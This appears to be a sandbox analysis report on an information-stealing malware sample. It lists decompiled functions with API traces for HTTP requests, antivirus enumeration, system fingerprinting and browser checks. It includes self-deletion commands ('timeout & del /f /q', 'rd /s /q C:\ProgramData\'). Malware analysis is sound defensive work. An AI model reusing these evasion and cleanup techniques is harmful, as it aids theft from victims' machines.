                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    • API String ID: 2435781452-2509457195
                                                                                    • Opcode ID: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
                                                                                    • Instruction ID: 4f8882304835992de02ce188a42af96545f0e5a020f056082c0570d921596d9d
                                                                                    • Opcode Fuzzy Hash: 899a52d47c7290b0c62d563f9c6a8f5db657679a145607c8c84c3a78f8ada9c9
                                                                                    • Instruction Fuzzy Hash: BF513F71900119AFEB11EBE0DC85FEEBBB9EB09744F10403AF605B2191DB795E488BA5
                                                                                    Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004041B7
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                    • String ID: GET
                                                                                    • API String ID: 1687531150-1805413626
                                                                                    • Opcode ID: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
                                                                                    • Instruction ID: 70797dbb62b7227b97fb4dad1cf9611d4221403ee57f1c0e2ca818baf810037a
                                                                                    • Opcode Fuzzy Hash: 0a3a0618bbe36edcb62e868f1fafd794c33d3d2d9b336a3c2704ce5094abb541
                                                                                    • Instruction Fuzzy Hash: DB516EB2900219AFDF10EFE0DC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                    Function 004136E3 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004136E8
                                                                                    • memset.MSVCRT ref: 00413708
                                                                                    • memset.MSVCRT ref: 00413714
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                    • memset.MSVCRT ref: 004138C2
                                                                                    • memset.MSVCRT ref: 004138D0
                                                                                    • ExitProcess.KERNEL32 ref: 004138E1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                    • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                    • API String ID: 1312519015-206210831
                                                                                    • Opcode ID: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
                                                                                    • Instruction ID: 7cc86f5a3bc31e5bf112f7f201b24b9592421ec460c7ef1d8f903e98a033c0e4
                                                                                    • Opcode Fuzzy Hash: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
                                                                                    • Instruction Fuzzy Hash: EF512DB1D0024DEEDB11EBE1C992ADEBBB8AF18304F50017EE505B3582DB785B48CB65
                                                                                    Function 00410925 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041092A
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?,00000000), ref: 00410942
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                    • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000,?), ref: 0041096D
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                    • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C,00000000), ref: 00410C95
                                                                                      • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                    • API String ID: 3694693100-315474579
                                                                                    • Opcode ID: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                    • Instruction ID: eaee24b4b2737a5a762c4e74348500a03556ab89a27190f447ac073c3fdbdc8f
                                                                                    • Opcode Fuzzy Hash: 69e3ebb3ae139267ec9dcccb77a6a5073b61d7bf20a9a102ba59cc22b6a9a18b
                                                                                    • Instruction Fuzzy Hash: 5A418E70A01229BFCB20DB95DD49EEF7F79EF49B60F60411AF115A6180C7B85A41CBE8
                                                                                    Function 00410071 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                    • wsprintfA.USER32 ref: 00410132
                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                    • String ID: - $%s\%s$?
                                                                                    • API String ID: 404191982-3278919252
                                                                                    • Opcode ID: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                    • Instruction ID: 7ab7514c44e0da1f2f7805acf3a1e45dd26abe84cf75324248915fb0e6202ea1
                                                                                    • Opcode Fuzzy Hash: 31e2b9dd4df46e591392e58f3efde1d97b51e578d32717b35a6573e8f202f5e3
                                                                                    • Instruction Fuzzy Hash: 087102B190021DEEDF11EBE1CD84EEEBBB9BB18304F50417AE905B2151DB785A88CB65
                                                                                    Function 0040F689 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040F68E
                                                                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0040F6A4
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040F6C6
                                                                                    • memset.MSVCRT ref: 0040F708
                                                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 0040F841
                                                                                      • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                      • Part of subcall function 0040DD10: memcpy.MSVCRT ref: 0040DD30
                                                                                    Strings
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F720, 0040F809
                                                                                    • N0ZWFt, xrefs: 0040F7AB, 0040F7B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                    • API String ID: 3050127167-1622206642
                                                                                    • Opcode ID: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                    • Instruction ID: d92978c317b697945912aa173a1e05ead718c9e6d1350f194c4815b503896aae
                                                                                    • Opcode Fuzzy Hash: 6d550b47649cbc074e826e347ff90771797366bbdea03ead8e58419020fff812
                                                                                    • Instruction Fuzzy Hash: A8517E71900219AEDB20EB94DC81AEEBBB9EF04314F20017FF114B66C1DB795E88CB59
                                                                                    Function 004104DD Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004104E2
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                    • wsprintfA.USER32 ref: 004105AD
                                                                                    • lstrcat.KERNEL32(00000000,004262A0), ref: 004105BC
                                                                                      • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                      • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                      • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                    • String ID: :\$C
                                                                                    • API String ID: 688099012-3309953409
                                                                                    • Opcode ID: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                    • Instruction ID: 84e118196ac0f38cbb6e09dfb40efd972d04435529832d229da92da0b26732ed
                                                                                    • Opcode Fuzzy Hash: 416253e965eb42c759364b255e4ecd1a0613b221ded167edafa7b177bf4c383f
                                                                                    • Instruction Fuzzy Hash: 8E418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA785A48CBB5
                                                                                    Function 00413118 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                      • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                      • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                      • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                      • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                      • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                      • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3807055897-1526165396
                                                                                    • Opcode ID: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                    • Instruction ID: 555d10d1ffafafdd123518b884250a5375e6a4b62cd9d48d02a2f87644db10f1
                                                                                    • Opcode Fuzzy Hash: d0459109369f2f4c7748f439c483f4eaf3f7582e003e90059872d5f537bb727b
                                                                                    • Instruction Fuzzy Hash: 7141A6B1900258EACB11FFA1D956FDDB7B4AF18708F10007FE90173182DB386B488A6A
                                                                                    Function 0040ED08 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040ED0D
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040ED51
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EDC5
                                                                                    • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040EEE1
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040D3FA: _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040B8AF: _EH_prolog.MSVCRT ref: 0040B8B4
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040EFB0
                                                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040F025
                                                                                    • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040F140
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
